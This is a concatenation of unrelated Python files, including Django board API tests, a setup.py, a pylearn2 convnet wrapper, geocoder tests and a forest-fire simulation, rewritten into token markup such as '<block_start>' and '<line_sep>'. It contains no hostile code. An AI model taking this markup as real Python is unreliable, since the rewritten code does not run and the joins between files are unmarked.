silent=<true>)<block_end><assert_stmt>accounts[0]._pending_nonce()<eq>3<assert_stmt>accounts[0].nonce<l>3<line_sep>time.sleep(3.5)<assert_stmt>accounts[0].nonce<eq>3<block_end><def_stmt>test_multithreading accounts history block_time_network<block_start>threads=[]<for_stmt>_ range(3)<block_start>thread=threading.Thread(target=send_and_wait_for_tx daemon=<true>)<line_sep>threads.append(thread)<line_sep>thread.start()<block_end><for_stmt>thread threads<block_start>thread.join()<block_end><for_stmt>tx history<block_start><assert_stmt>tx.status<eq>1<assert_stmt>tx.confirmations<ge>2<block_end><block_end>
<import_from_stmt>setuptools setup find_packages<with_stmt>open("README.md" "r")<as>fh<block_start>long_description=fh.read()<block_end>NAME="energyusage"<line_sep>VERSION="0.0.13"<line_sep>DESCRIPTION="Measuring the environmental impact of computation"<line_sep>LONG_DESCRIPTION=long_description<line_sep>LONG_DESCRIPTION_CONTENT_TYPE='text/markdown'<line_sep>URL="https://github.com/responsibleproblemsolving/energy-usage"<line_sep>AUTHOR="<NAME>, <NAME>, <NAME>"<line_sep>AUTHOR_EMAIL="<EMAIL>"<line_sep>LICENSE="Apache 2.0"<line_sep>CLASSIFIERS=["Programming Language :: Python :: 3" "License :: OSI Approved :: Apache Software License" "Operating System :: OS Independent" ]<line_sep>PACKAGES=['energyusage']<line_sep>PACKAGE_DATA={'energyusage.data.csv':['*.csv'] 'energyusage.data.json':['*.json']}<line_sep>INCLUDE_PACKAGE_DATA=<true><line_sep>PACKAGE_DIR={'energyusage.data':'data'}<line_sep>INSTALL_REQUIRES=['requests' 'reportlab']<line_sep>setup(name=NAME version=VERSION description=DESCRIPTION long_description=LONG_DESCRIPTION long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE url=URL author=AUTHOR author_email=AUTHOR_EMAIL license=LICENSE classifiers=CLASSIFIERS packages=PACKAGES package_data=PACKAGE_DATA include_package_data=INCLUDE_PACKAGE_DATA package_dir=PACKAGE_DIR install_requires=INSTALL_REQUIRES)<line_sep>
<import_from_stmt>core.models ProviderType<import_from_stmt>api.v2.serializers.details ProviderTypeSerializer<import_from_stmt>api.v2.views.base AuthModelViewSet<class_stmt>ProviderTypeViewSet(AuthModelViewSet)<block_start>""" API endpoint that allows instance actions to be viewed or edited. """<line_sep>queryset=ProviderType.objects.all()<line_sep>serializer_class=ProviderTypeSerializer<line_sep>http_method_names=['get' 'head' 'options' 'trace']<block_end>
<import_stmt>dash_bootstrap_components<as>dbc<import_from_stmt>dash html<import_from_stmt>.util make_subheading<line_sep>form=html.Div([make_subheading("Form" "form") dbc.Form([html.Div([dbc.Label("Username") dbc.Input(placeholder="Enter your username" type="text" ) dbc.FormText(["Can't remember your username? " html.A("Click here." href="#" className="text-muted" style={"textDecoration":"underline"} ) ]) ]) html.Div([dbc.Label("Username") dbc.Input(placeholder="Enter your password" type="password" ) dbc.FormText(["Can't remember your password? " html.A("Click here." href="#" className="text-muted" style={"textDecoration":"underline"} ) ]) ]) ]) ] className="mb-4" )<line_sep>
<import_stmt>pytest<import_from_stmt>django.contrib.auth get_user_model<import_from_stmt>rest_framework.reverse reverse<import_from_stmt>boards.models Column Board Task<line_sep>User=get_user_model()<line_sep>@pytest.fixture<def_stmt>board create_user<block_start>user=create_user()<line_sep>uni_board=Board.objects.create(name="University" owner=user)<line_sep>uni_board.members.add(user)<line_sep><return>uni_board<block_end>@pytest.fixture<def_stmt>col_backlog board<block_start><return>Column.objects.create(board=board title="Backlog" column_order=1)<block_end>@pytest.fixture<def_stmt>col_done board<block_start><return>Column.objects.create(board=board title="Done" column_order=2)<block_end><def_stmt>test_order_columns api_client_with_credentials col_backlog col_done<block_start>""" Order columns: Backlog, Done -> Done, Backlog """<line_sep>response=api_client_with_credentials.post(reverse("sort-column") {"order":[col_done.id col_backlog.id]})<line_sep>col_backlog.refresh_from_db()<line_sep>col_done.refresh_from_db()<assert_stmt>response.status_code<eq>200<assert_stmt>col_done.column_order<eq>1<assert_stmt>col_backlog.column_order<eq>2<block_end><def_stmt>test_order_tasks_same_column api_client_with_credentials column_factory task_factory<block_start>""" Order tasks (in one column): Task1, Task2, Task3 -> Task3, Task1, Task2 """<line_sep>column=column_factory()<line_sep>task1=task_factory(column=column task_order=1)<line_sep>task2=task_factory(column=column task_order=2)<line_sep>task3=task_factory(column=column task_order=3)<line_sep># Initial state column.refresh_from_db()<assert_stmt>list(column.tasks.all())<eq>[task1 task2 task3]<line_sep>response=api_client_with_credentials.post(reverse("sort-task") {"board":column.board.id "tasks":{column.id:[task3.id task1.id task2.id]} "order":[task3.id task1.id task2.id] } )<assert_stmt>response.status_code<eq>200<line_sep># State after ordering column.refresh_from_db()<assert_stmt>list(column.tasks.all())<eq>[task3 task1 task2]<block_end><def_stmt>test_order_tasks_between_two_columns api_client_with_credentials board_factory column_factory task_factory<block_start>""" Order tasks between two columns: Column1: Task1, Task2, Task3 Column2: Task4, Task5 After order: Column1: Task1, Task3 Column2: Task4, Task2, Task5 """<line_sep>board=board_factory()<line_sep>column1=column_factory(board=board)<line_sep>column2=column_factory(board=board)<line_sep>task1=task_factory(column=column1 task_order=1)<line_sep>task2=task_factory(column=column1 task_order=2)<line_sep>task3=task_factory(column=column1 task_order=3)<line_sep>task4=task_factory(column=column2 task_order=4)<line_sep>task5=task_factory(column=column2 task_order=5)<line_sep># Initial state column1.refresh_from_db()<line_sep>column2.refresh_from_db()<assert_stmt>list(column1.tasks.all())<eq>[task1 task2 task3]<assert_stmt>list(column2.tasks.all())<eq>[task4 task5]<line_sep>response=api_client_with_credentials.post(reverse("sort-task") {"board":column1.board.id "tasks":{column1.id:[task1.id task3.id] column2.id:[task4.id task2.id task5.id] } "order":[task1.id task3.id task4.id task2.id task5.id] } )<assert_stmt>response.status_code<eq>200<line_sep># State after ordering column1.refresh_from_db()<line_sep>column2.refresh_from_db()<assert_stmt>list(column1.tasks.all())<eq>[task1 task3]<assert_stmt>list(column2.tasks.all())<eq>[task4 task2 task5]<block_end><def_stmt>test_invalid_move_atomic api_client_with_credentials board_factory column_factory task_factory<block_start>board=board_factory()<line_sep>col1=column_factory(board=board)<line_sep>col2=column_factory(board=board)<line_sep>col3=column_factory(board=board)<line_sep>col1_task=task_factory(column=col1 task_order=1)<line_sep>col2_task=task_factory(column=col2 task_order=2)<line_sep>response=api_client_with_credentials.post(reverse("sort-task") {"board":board.id "tasks":{col1.id:[col1_task.id col2_task.id] col3.id:[col1_task.id col2_task.id] } "order":[col1_task.id col2_task.id] } )<assert_stmt>response.status_code<eq>400<line_sep># State should remain the same col1.refresh_from_db()<line_sep>col2.refresh_from_db()<line_sep>col3.refresh_from_db()<assert_stmt>list(col1.tasks.all())<eq>[col1_task]<assert_stmt>list(col2.tasks.all())<eq>[col2_task]<assert_stmt>list(col3.tasks.all())<eq>[]<block_end><def_stmt>test_can_not_order_tasks_between_two_boards api_client_with_credentials board_factory column_factory task_factory<block_start>board1=board_factory()<line_sep>board2=board_factory()<line_sep>board1_col=column_factory(board=board1)<line_sep>board2_col=column_factory(board=board2)<line_sep>board1_task=task_factory(column=board1_col task_order=1)<line_sep>board2_task=task_factory(column=board2_col task_order=2)<line_sep>response=api_client_with_credentials.post(reverse("sort-task") {"board":board1.id "tasks":{board1_col.id:[] board2_col.id:[board1_task.id board2_task.id] } "order":[board1_task.id board2_task.id] } )<assert_stmt>response.status_code<eq>400<block_end><def_stmt>test_order_duplicate api_client_with_credentials col_done<block_start>response=api_client_with_credentials.post(reverse("sort-column") {"order":[col_done.id col_done.id]})<assert_stmt>response.status_code<eq>400<block_end>@pytest.mark.parametrize("post_data,expected_status_code" [({"order":[1 2]} 200) ({"order":[1 1]} 400) ({"order":[-1]} 400) ({"order":"nope"} 400) ({"order":{"asd"}} 400) ({"other":"bad data"} 400) ({} 400) ] )<def_stmt>test_order_column_status_code post_data expected_status_code api_client_with_credentials board<block_start>Column.objects.create(id=1 board=board title="col1")<line_sep>Column.objects.create(id=2 board=board title="col2")<line_sep>response=api_client_with_credentials.post(reverse("sort-column") post_data)<assert_stmt>response.status_code<eq>expected_status_code<block_end><def_stmt>test_board_list api_client steve amy leo<block_start>uni_board=Board.objects.create(name="University" owner=steve)<line_sep>uni_board.members.set([steve amy])<line_sep>get_board_list=<lambda>:api_client.get(reverse("board-list"))<line_sep># Not authenticated response=get_board_list()<assert_stmt>response.status_code<eq>401<line_sep># Owner can see his own boards api_client.force_authenticate(user=steve)<line_sep>response=get_board_list()<assert_stmt>response.status_code<eq>200<assert_stmt>len(response.data)<eq>1<line_sep># Members can see the their boards api_client.force_authenticate(user=amy)<line_sep>response=get_board_list()<assert_stmt>response.status_code<eq>200<assert_stmt>len(response.data)<eq>1<line_sep># Not part of any boards, can't see any api_client.force_authenticate(user=leo)<line_sep>response=get_board_list()<assert_stmt>response.status_code<eq>200<assert_stmt>len(response.data)<eq>0<block_end><def_stmt>test_board_detail api_client steve amy leo<block_start>uni_board=Board.objects.create(name="University" owner=steve)<line_sep>uni_board.members.set([steve amy])<line_sep>get_uni_board_detail=<lambda>:api_client.get(reverse("board-detail" kwargs={"pk":uni_board.id}))<line_sep># Not authenticated response=get_uni_board_detail()<assert_stmt>response.status_code<eq>401<line_sep># Owner can see his own board api_client.force_authenticate(user=steve)<line_sep>response=get_uni_board_detail()<assert_stmt>response.status_code<eq>200<assert_stmt>response.data["name"]<eq>"University"<line_sep># Member can see the board api_client.force_authenticate(user=amy)<line_sep>response=get_uni_board_detail()<assert_stmt>response.status_code<eq>200<assert_stmt>response.data["name"]<eq>"University"<line_sep># Not part of the board, can't see it api_client.force_authenticate(user=leo)<line_sep>response=get_uni_board_detail()<assert_stmt>response.status_code<eq>404<block_end><def_stmt>test_board_delete api_client steve amy leo<block_start>uni_board=Board.objects.create(name="University" owner=steve)<line_sep>uni_board.members.set([steve amy])<line_sep>delete_uni_board=<lambda>:api_client.delete(reverse("board-detail" kwargs={"pk":uni_board.id}))<line_sep># Not authenticated response=delete_uni_board()<assert_stmt>response.status_code<eq>401<assert_stmt>Board.objects.filter(id=uni_board.id).exists()<line_sep># Not part of the board, can't see it api_client.force_authenticate(user=leo)<line_sep>response=delete_uni_board()<assert_stmt>response.status_code<eq>404<assert_stmt>Board.objects.filter(id=uni_board.id).exists()<line_sep># Member can't delete the board api_client.force_authenticate(user=amy)<line_sep>response=delete_uni_board()<assert_stmt>response.status_code<eq>403<assert_stmt>Board.objects.filter(id=uni_board.id).exists()<line_sep># Owner can see his own board api_client.force_authenticate(user=steve)<line_sep>response=delete_uni_board()<assert_stmt>response.status_code<eq>204<assert_stmt><not>Board.objects.filter(id=uni_board.id).exists()<block_end><def_stmt>test_board_create api_client steve amy<block_start><assert_stmt>len(Board.objects.all())<eq>0<line_sep>create_board=<lambda>:api_client.post(reverse("board-list") {"name":"Pets"})<line_sep># Not authenticated response=create_board()<assert_stmt>response.status_code<eq>401<assert_stmt>len(Board.objects.all())<eq>0<line_sep># Steve should be owner and member after creation api_client.force_authenticate(user=steve)<line_sep>response=create_board()<assert_stmt>response.status_code<eq>201<assert_stmt>len(Board.objects.all())<eq>1<line_sep>pets=Board.objects.get(name="Pets")<assert_stmt>pets.owner<eq>steve<assert_stmt>list(pets.members.all())<eq>[steve]<line_sep># Amy should not see any boards api_client.force_authenticate(user=amy)<line_sep>response=api_client.get(reverse("board-list"))<assert_stmt>response.status_code<eq>200<assert_stmt>len(response.data)<eq>0<block_end><def_stmt>test_board_invite_member api_client board_factory steve leo amy<block_start>board=board_factory(owner=steve)<line_sep>board.members.set([leo steve])<line_sep># Initially there are two members <assert_stmt>len(board.members.all())<eq>2<line_sep>send_invite=<lambda>users_ids:api_client.post(reverse("board-invite-member" kwargs={"pk":board.id}) {"users":users_ids})<line_sep># Not authenticated response=send_invite([amy.id])<assert_stmt>response.status_code<eq>401<assert_stmt>len(board.members.all())<eq>2<line_sep># Leo is not an owner and should not be able to invite others api_client.force_authenticate(user=leo)<line_sep>response=send_invite([amy.id])<assert_stmt>response.status_code<eq>403<assert_stmt>len(board.members.all())<eq>2<line_sep># Steve as the owner should be able to successfully invite Amy api_client.force_authenticate(user=steve)<line_sep>response=send_invite([amy.id])<assert_stmt>response.status_code<eq>200<assert_stmt>len(board.members.all())<eq>3<assert_stmt>amy.id<in>list(map(<lambda>member:member.id board.members.all()))<line_sep># Should handle adding an existing member response=send_invite([steve.id])<assert_stmt>response.status_code<eq>200<assert_stmt>len(board.members.all())<eq>3<line_sep># Should handle adding non existant user response=send_invite([-1])<assert_stmt>response.status_code<eq>400<assert_stmt>len(board.members.all())<eq>3<block_end><def_stmt>test_board_remove_member api_client board_factory column_factory task_factory steve leo amy mike<block_start>board=board_factory(owner=steve)<line_sep>board.members.set([steve leo amy])<line_sep>column=column_factory(board=board)<line_sep>task=task_factory(column=column)<line_sep># Initially there are two members <assert_stmt>len(board.members.all())<eq>3<line_sep>remove_member=<lambda>username:api_client.post(reverse("board-remove-member" kwargs={"pk":board.id}) {"username":username})<line_sep># Not authenticated response=remove_member(leo.username)<assert_stmt>response.status_code<eq>401<assert_stmt>len(board.members.all())<eq>3<line_sep># Leo should not be able to remove Amy (Leo isn't the owner) api_client.force_authenticate(user=leo)<line_sep>response=remove_member(amy.username)<assert_stmt>response.status_code<eq>403<assert_stmt>len(board.members.all())<eq>3<line_sep># Steve can't remove himself (the owner) api_client.force_authenticate(user=steve)<line_sep>response=remove_member(steve.username)<assert_stmt>response.status_code<eq>400<assert_stmt>len(board.members.all())<eq>3<line_sep># Steve can't remove Mike (not a member of the board) response=remove_member(mike.username)<assert_stmt>response.status_code<eq>400<assert_stmt>len(board.members.all())<eq>3<line_sep># Steve can't remove a non existant user response=remove_member("notvalidusername")<assert_stmt>response.status_code<eq>400<assert_stmt>len(board.members.all())<eq>3<line_sep># Steve can remove Leo, should also remove Leo from tasks task.assignees.set([leo])<assert_stmt>len(task.assignees.all())<eq>1<line_sep>response=remove_member(leo.username)<assert_stmt>response.status_code<eq>200<assert_stmt>len(board.members.all())<eq>2<assert_stmt>leo.id<not><in>list(map(<lambda>member:member.id board.members.all()))<assert_stmt>len(task.assignees.all())<eq>0<block_end><def_stmt>test_update_task_title api_client task_factory steve amy<block_start>task=task_factory(title="Landing page design")<line_sep>board=task.column.board<line_sep>board.members.set([steve])<line_sep>new_title="Admin page permissions"<line_sep>update_title=<lambda>:api_client.patch(reverse("task-detail" kwargs={"pk":task.id}) {"title":new_title})<line_sep># Not authenticated response=update_title()<assert_stmt>response.status_code<eq>401<line_sep># Amy not a member, doesn't know about the task api_client.force_authenticate(user=amy)<line_sep>response=update_title()<assert_stmt>response.status_code<eq>404<line_sep># Steve is a board member, can update api_client.force_authenticate(user=steve)<line_sep>response=update_title()<line_sep>task.refresh_from_db()<assert_stmt>response.status_code<eq>200<assert_stmt>task.title<eq>new_title<block_end><def_stmt>test_delete_task api_client task_factory steve amy<block_start>task=task_factory()<line_sep>board=task.column.board<line_sep>board.members.set([steve])<line_sep>delete_task=<lambda>:api_client.delete(reverse("task-detail" kwargs={"pk":task.id}))<line_sep># Not authenticated response=delete_task()<assert_stmt>response.status_code<eq>401<line_sep># Amy not a member, doesn't know about the task api_client.force_authenticate(user=amy)<line_sep>response=delete_task()<assert_stmt>response.status_code<eq>404<line_sep># Steve is a board member, can delete api_client.force_authenticate(user=steve)<line_sep>response=delete_task()<assert_stmt>response.status_code<eq>204<assert_stmt><not>Task.objects.filter(id=task.id).exists()<block_end><def_stmt>test_update_column_title api_client column_factory steve amy<block_start>column=column_factory(title="On Hold")<line_sep>board=column.board<line_sep>board.members.set([steve])<line_sep>new_title="Ready"<line_sep>update_column_title=<lambda>:api_client.patch(reverse("column-detail" kwargs={"pk":column.id}) {"title":new_title})<line_sep># Not authenticated response=update_column_title()<assert_stmt>response.status_code<eq>401<line_sep># Amy not a member, doesn't know about the column api_client.force_authenticate(user=amy)<line_sep>response=update_column_title()<assert_stmt>response.status_code<eq>404<line_sep># Steve is a board member, can update api_client.force_authenticate(user=steve)<line_sep>response=update_column_title()<line_sep>column.refresh_from_db()<assert_stmt>response.status_code<eq>200<assert_stmt>column.title<eq>new_title<block_end><def_stmt>test_create_column api_client board_factory steve amy<block_start>board=board_factory(name="Internals")<line_sep>board.members.set([steve])<line_sep>column_data={"title":"Send verification email on Regiser" "board":board.id}<line_sep>create_column=<lambda>post_data:api_client.post(reverse("column-list") post_data)<line_sep># Not authenticated response=create_column(column_data)<assert_stmt>response.status_code<eq>401<line_sep># Amy not a member api_client.force_authenticate(user=amy)<line_sep>response=create_column(column_data)<assert_stmt>response.status_code<eq>400<assert_stmt>response.data[0]<eq>"Must be a member of the board!"<line_sep># Steve is a board member, can create api_client.force_authenticate(user=steve)<line_sep>response=create_column(column_data)<assert_stmt>response.status_code<eq>201<assert_stmt>Column.objects.filter(title=column_data["title"]).exists()<block_end><def_stmt>test_create_task api_client column_factory steve amy<block_start>column=column_factory(title="Blocked")<line_sep>board=column.board<line_sep>board.members.set([steve])<line_sep>task_data={"title":"Send verification email on Regiser" "description":"<p>Send a verification email when a new user registers. "<concat>"Email template is provided by Dave.</p><p><br></p><p>Use our main SMTP provider.</p>" "column":column.id "labels":[] "assignees":[steve.id] "priority":"H" }<line_sep>create_task=<lambda>post_data:api_client.post(reverse("task-list") post_data)<line_sep># Not authenticated response=create_task(task_data)<assert_stmt>response.status_code<eq>401<line_sep># Amy not a member <assert_stmt>amy<not><in>board.members.all()<line_sep>api_client.force_authenticate(user=amy)<line_sep>response=create_task(task_data)<assert_stmt>response.status_code<eq>400<assert_stmt>response.data[0]<eq>"Must be a member of the board!"<line_sep># One of the assignees (amy) is not a member api_client.force_authenticate(user=steve)<line_sep>response=create_task({**task_data "assignees":[steve.id amy.id]})<assert_stmt>response.status_code<eq>400<assert_stmt>response.data[0]<eq>"Can't assign someone who isn't a board member!"<line_sep># Steve is a board member, can create api_client.force_authenticate(user=steve)<line_sep>response=create_task(task_data)<assert_stmt>response.status_code<eq>201<assert_stmt>Task.objects.filter(title=task_data["title"]).exists()<block_end><def_stmt>test_only_board_members_see_labels api_client board_factory label_factory steve amy<block_start>board=board_factory(name="Internals")<line_sep>board.members.set([steve])<line_sep>label=label_factory(name="Documentation" board=board)<line_sep>get_label=<lambda>:api_client.get(reverse("label-detail" kwargs={"pk":label.id}))<line_sep># Steve is a board member, can get label api_client.force_authenticate(user=steve)<line_sep>response=get_label()<assert_stmt>response.status_code<eq>200<line_sep># Amy is a not a board member, doesn't know about the label api_client.force_authenticate(user=amy)<line_sep>response=get_label()<assert_stmt>response.status_code<eq>404<block_end><def_stmt>test_add_labels_to_task api_client board_factory column_factory task_factory label_factory steve amy<block_start>board1=board_factory()<line_sep>board1.members.set([steve])<line_sep>board2=board_factory()<line_sep>column1=column_factory(board=board1)<line_sep>label1=label_factory(board=board1)<line_sep>label2=label_factory(board=board2)<line_sep>task1=task_factory(column=column1)<line_sep>add_labels=<lambda>labels:api_client.patch(reverse("task-detail" kwargs={"pk":task1.id}) {"labels":labels})<line_sep># Can't add a label when not a member api_client.force_authenticate(user=amy)<line_sep>response=add_labels([label1.id])<line_sep>task1.refresh_from_db()<assert_stmt>response.status_code<eq>404<assert_stmt>len(task1.labels.all())<eq>0<line_sep># Can't add a label from a different board api_client.force_authenticate(user=steve)<line_sep>response=add_labels([label1.id label2.id])<line_sep>task1.refresh_from_db()<assert_stmt>response.status_code<eq>400<assert_stmt>response.data[0]<eq>"Can't set a label that doesn't belong to the board!"<assert_stmt>len(task1.labels.all())<eq>0<line_sep># Can add a label of this board as member api_client.force_authenticate(user=steve)<line_sep>response=add_labels([label1.id])<line_sep>task1.refresh_from_db()<assert_stmt>response.status_code<eq>200<assert_stmt>[label.id<for>label task1.labels.all()]<eq>[label1.id]<block_end><def_stmt>test_label_names_unique_per_board api_client board_factory label_factory steve amy<block_start>board=board_factory()<line_sep>board.members.set([steve])<line_sep>label1=label_factory(board=board name="Hotfix")<line_sep>label_factory(board=board name="Bug")<line_sep>api_client.force_authenticate(user=steve)<line_sep>response=api_client.patch(reverse("label-detail" kwargs={"pk":label1.id}) {"name":"Bug"})<assert_stmt>response.status_code<eq>400<block_end>
""" Base class for wrapping """<line_sep>__authors__="<NAME>"<line_sep>__copyright__="Copyright 2010-2012, Universite de Montreal"<line_sep>__credits__=["<NAME>" "<NAME>"]<line_sep>__license__="3-clause BSD"<line_sep>__maintainer__="<NAME>"<line_sep>__email__="<EMAIL>"<line_sep>""" This module may contain code copied directly or modified from cuda-convnet. The copyright and licensing notice for this code is reproduced below: /* * Copyright (c) 2011, <NAME> (<EMAIL>) * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * - Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * - Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ """<import_stmt>warnings<import_stmt>theano<import_from_stmt>theano.compat get_unbound_function<import_from_stmt>theano config<import_from_stmt>theano.sandbox.cuda GpuOp<import_from_stmt>pylearn2.sandbox.cuda_convnet.shared_code this_dir<import_from_stmt>pylearn2.sandbox.cuda_convnet.convnet_compile convnet_available<import_from_stmt>pylearn2.sandbox.cuda_convnet.convnet_compile cuda_convnet_loc<import_from_stmt>pylearn2.utils py_integer_types<import_stmt>pylearn2.sandbox.cuda_convnet.pthreads<class_stmt>BaseActs(GpuOp)<block_start>""" Shared code for wrapping various convnet operations. """<def_stmt>__init__ self pad=0 partial_sum=<none> stride=1<block_start><if_stmt><not>isinstance(pad py_integer_types)<block_start><raise>TypeError("pad must be an int")<block_end><if_stmt><not>(pad<ge>0)<block_start><raise>ValueError("bad value of pad (must be non-negative): "+str(pad))<block_end>self.partial_sum=partial_sum<line_sep>self.pad=pad<line_sep>self.stride=stride<line_sep>self.copy_non_contiguous=0<line_sep># TODO: support sparse connectivity pattern self.dense_connectivity=<true><block_end><def_stmt>c_header_dirs self<block_start><if_stmt>config.pthreads.inc_dir<block_start><return>[this_dir config.pthreads.inc_dir]<block_end><else_stmt><block_start><return>[this_dir]<block_end><block_end><def_stmt>c_headers self<block_start><return>['nvmatrix.cuh' 'cudaconv2.cuh']<block_end><def_stmt>c_code_cache_version self<block_start>warnings.warn("No C-code cache version for %s"%self.__class__.__name__)<line_sep><return>()<block_end><def_stmt>c_lib_dirs self<block_start><if_stmt>config.pthreads.lib_dir<block_start><return>[cuda_convnet_loc config.pthreads.lib_dir]<block_end><else_stmt><block_start><return>[cuda_convnet_loc]<block_end><block_end><def_stmt>c_libraries self<block_start><if_stmt>config.pthreads.lib<block_start><return>['cuda_convnet' config.pthreads.lib]<block_end><else_stmt><block_start><return>['cuda_convnet']<block_end><block_end><def_stmt>_argument_contiguity_check self arg_name<block_start><return>""" if (!CudaNdarray_is_c_contiguous(%%(%(arg_name)s)s)) { if (!(%(class_name_caps)s_COPY_NON_CONTIGUOUS)) { PyErr_SetString(PyExc_ValueError, "%(class)s: %(arg_name)s must be C contiguous"); %%(fail)s; } } """%{'class':self.__class__.__name__ 'arg_name':arg_name 'class_name_caps':self.__class__.__name__.upper() }<block_end><def_stmt>_argument_dimension_check self arg_name ndim<block_start><return>""" if (%%(%(arg_name)s)s->nd != %(ndim)d) { PyErr_Format(PyExc_ValueError, "%(arg_name)s must have ndim=%(ndim)d, got nd=%%%%i", %%(%(arg_name)s)s->nd); %%(fail)s; } """%locals()<block_end><def_stmt>__eq__ self other<block_start><return>(type(self)<eq>type(other)<and>self.partial_sum<eq>other.partial_sum<and>self.pad<eq>other.pad<and>self.dense_connectivity<eq>other.dense_connectivity<and>self.stride<eq>other.stride<and>self.copy_non_contiguous<eq>other.copy_non_contiguous)<block_end><def_stmt>__hash__ self<block_start>msg=[]<line_sep>msg.append(self.__class__.__name__)<for_stmt>val (self.partial_sum self.pad self.dense_connectivity self.stride self.copy_non_contiguous)<block_start>msg.append(str(val))<block_end><return>hash(tuple(msg))<block_end># Make sure the cuda_convnet library is compiled and up-to-date <def_stmt>make_thunk self *args **kwargs<block_start><if_stmt><not>convnet_available()<block_start><raise>RuntimeError('Could not compile cuda_convnet')<block_end><return>super(BaseActs self).make_thunk(*args **kwargs)<block_end><block_end># This is needed as otherwise DebugMode will consider that # BaseActs.make_thunk do something else then the default code, and # would duplicate verification. theano.compile.debugmode.default_make_thunk.append(get_unbound_function(BaseActs.make_thunk))<class_stmt>UnimplementedError(Exception)<block_start>""" Like NotImplementedError, but designed not to be caught and suppressed by theano. """<block_end>
# coding: utf8 <import_stmt>geocoder<line_sep>location='Ottawa'<line_sep>coordinates={'lat':41.005407 'lng':28.978349}<def_stmt>test_yandex <block_start>g=geocoder.yandex(location)<assert_stmt>g.ok<block_end><def_stmt>test_yandex_reverse <block_start>g=geocoder.yandex(coordinates method='reverse')<assert_stmt>g.ok<block_end><def_stmt>test_multi_results <block_start>g=geocoder.yandex(location maxRows=3)<assert_stmt>len(g)<eq>3<block_end>
<import_stmt>pycxsimulator<import_from_stmt>pylab *<line_sep>width=50<line_sep>height=50<line_sep>initProb=0.01<line_sep>infectionRate=0.85<line_sep>regrowthRate=0.15<def_stmt>initialize <block_start><global>time config nextConfig<line_sep>time=0<line_sep>config=zeros([height width])<for_stmt>x range(width)<block_start><for_stmt>y range(height)<block_start><if_stmt>random()<l>initProb<block_start>state=2<block_end><else_stmt><block_start>state=1<block_end>config[y x]=state<block_end><block_end>nextConfig=zeros([height width])<block_end><def_stmt>observe <block_start>cla()<line_sep>imshow(config vmin=0 vmax=2 cmap=cm.jet)<line_sep>axis('image')<line_sep>title('t = '+str(time))<block_end><def_stmt>update <block_start><global>time config nextConfig<line_sep>time<augadd>1<for_stmt>x range(width)<block_start><for_stmt>y range(height)<block_start>state=config[y x]<if_stmt>state<eq>0<block_start><for_stmt>dx range(-1 2)<block_start><for_stmt>dy range(-1 2)<block_start><if_stmt>config[(y+dy)%height (x+dx)%width]<eq>1<block_start><if_stmt>random()<l>regrowthRate<block_start>state=1<block_end><block_end><block_end><block_end><block_end><elif_stmt>state<eq>1<block_start><for_stmt>dx range(-1 2)<block_start><for_stmt>dy range(-1 2)<block_start><if_stmt>config[(y+dy)%height (x+dx)%width]<eq>2<block_start><if_stmt>random()<l>infectionRate<block_start>state=2<block_end><block_end><block_end><block_end><block_end><else_stmt><block_start>state=0<block_end>nextConfig[y x]=state<block_end><block_end>config,nextConfig=nextConfig config<block_end>pycxsimulator.GUI().start(func=[initialize observe update])<line_sep>
# Copyright (c) 2016-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_from_stmt>caffe2.python workspace<import_stmt>os<import_stmt>tempfile<import_stmt>unittest<class_stmt>TestDB(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>handle,self.file_name=tempfile.mkstemp()<line_sep>os.close(handle)<line_sep>self.data=[("key{}".format(i).encode("ascii") "value{}".format(i).encode("ascii"))<for>i range(1 10)]<block_end><def_stmt>testSimple self<block_start>db=workspace.C.create_db("minidb" self.file_name workspace.C.Mode.write)<for_stmt>key,value self.data<block_start>transaction=db.new_transaction()<line_sep>transaction.put(key value)<del_stmt>transaction<block_end><del_stmt>db# should close DB db=workspace.C.create_db("minidb" self.file_name workspace.C.Mode.read)<line_sep>cursor=db.new_cursor()<line_sep>data=[]<while_stmt>cursor.valid()<block_start>data.append((cursor.key() cursor.value()))<line_sep>cursor.next()# noqa: B305 <block_end><del_stmt>cursor<line_sep>db.close()# test explicit db closer self.assertEqual(data self.data)<block_end><block_end>
<import_stmt>pytest<line_sep>@pytest.fixture<def_stmt>spam <block_start><return>"spam"<block_end>
